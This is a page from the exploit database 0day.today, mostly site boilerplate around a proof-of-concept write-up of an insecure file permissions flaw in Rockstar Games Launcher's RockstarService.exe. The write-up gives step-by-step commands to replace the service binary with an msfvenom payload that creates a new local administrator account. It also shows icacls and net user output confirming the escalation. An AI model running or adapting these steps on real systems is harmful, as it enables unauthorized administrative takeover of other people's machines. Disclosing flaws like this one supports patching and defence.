0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Rockstar Service - Insecure File Permissions Vulnerability

Author

George Tsimpidas

Risk

[

Security Risk Medium

]

0day-ID

Category

Date add

Platform

# Exploit Title: Rockstar Service - Insecure File Permissions
# Exploit Author: George Tsimpidas
# Software Link : https://socialclub.rockstargames.com/rockstar-games-launcher
# Version Patch: 1.0.37.349
# Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362

Vulnerability Description:

RockstarService.exe  suffers from an elevation of privileges vulnerability which can be used by an "Authenticated User" to modify the existing executable file of the service with a binary of his choice. The vulnerability exist due to weak set of permissions being granted to the "Authenticated Users Group" which grants the (M) Flag aka "Modify Privilege"

#PoC

 D:\Launcher> icacls .\Launcher.exe

.\Launcher.exe BUILTIN\Administrators:(I)(F)
               NT AUTHORITY\SYSTEM:(I)(F)
               NT AUTHORITY\Authenticated Users:(I)(M)
               BUILTIN\Users:(I)(RX)

#1. Create low privileged user & Login  to that user

C:\>net user lowpriv Password123! /add
C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"
User name lowpriv
Local Group Memberships *Users
Global Group memberships *None

#2. Move the RockstarService.exe to a new name

D:\Launcher> move RockstarService.exe RockstarService.exe.bk
1 file(s) moved.

#3. Create malicious binary on kali linux with MSF

msfvenom -f exe -p windows/exec CMD="net user placebo Password123! /add && net localgroup Administrators placebo /add" -o RockstarService.exe

#4. Transfer created 'RockstarService.exe' to the Windows Host

#5. Move the created 'RockstarService.exe' binary to the 'D:\Launcher' to replace the old one

#6. Now start the Service

Command : net start 'Rockstar Service'

Now check out that the user has been registered to the system and added to the local group of Administrators

C:\Users\lowpriv>net user placebo | findstr /i "Membership Name" | findstr
/v "Full"

User name placebo
Local Group Memberships *Administrators *Users
Global Group memberships *None

#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Rockstar Service - Insecure File Permissions Vulnerability

Report Error

Report Error